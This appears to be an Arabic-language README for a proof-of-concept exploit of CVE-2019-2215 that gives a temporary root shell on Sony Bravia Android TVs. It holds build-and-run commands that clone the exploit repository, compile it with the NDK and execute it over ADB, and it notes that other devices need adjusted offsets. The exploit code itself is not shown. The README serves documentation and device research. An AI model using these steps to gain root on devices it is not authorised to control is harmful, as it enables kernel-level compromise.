
Temproot لـ Bravia TV عبر CVE-2019-2215.
Temproot لتلفزيون Bravia عبر CVE-2019-2215.
عرض توضيحي لهجوم تصعيد امتيازات يتيح وصولًا للقراءة/الكتابة فقط إلى ذاكرة النواة، ويؤدي إلى صدفة جذر مؤقتة.
يعمل على أجهزة تلفزيون Sony Bravia التي تعمل بنظام Android 8 (الإصدار PKG6.0724) مع إصدار النواة 4.9.51.
لكي تعمل هذه الأداة على أجهزة و/أو أنوية أخرى متأثرة بنفس الثغرة، يجب إيجاد بعض الإزاحات وتغييرها. كما ذُكر في متعقب أخطاء Project Zero، فإن هذا ليس صعبًا للغاية.
تُتاح هذه الأداة وكودها المصدري لأغراض توثيقية وتعليمية فقط.
قد يؤدي استخدام هذه الأداة إلى تعطيل جهازك نهائيًا. لا تجرّبها إلا إذا كنت تعرف ما تفعله.
# Download the Android NDK.
user@host:~$ wget https://dl.google.com/android/repository/android-ndk-r20b-linux-x86_64.zip
# Extract the NDK and set its path as $ANDROID_NDK_HOME.
user@host:~$ unzip android-ndk-r20b-linux-x86_64.zip
user@host:~$ export ANDROID_NDK_HOME=~/android-ndk-r20b
# Clone the `CVE-2019-2215` git repository and `cd` into it.
user@host:~$ git clone https://github.com/LIznzn/CVE-2019-2215.git
user@host:~$ cd CVE-2019-2215
# Compile the binary.
user@host:~/CVE-2019-2215$ $ANDROID_NDK_HOME/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android21-clang poc-bravia.c -static -o poc-bravia
# Push binary to device.
user@host:~/CVE-2019-2215$ adb push ./poc-bravia /data/local/tmp/
# Use ADB Shell.
user@host:~/CVE-2019-2215$ adb shell
# Run it.
BRAVIA_4K_UR1:/ $ cd /data/local/tmp
BRAVIA_4K_UR1:/data/local/tmp $ chmod 755 poc-bravia
BRAVIA_4K_UR1:/data/local/tmp $ ./poc-bravia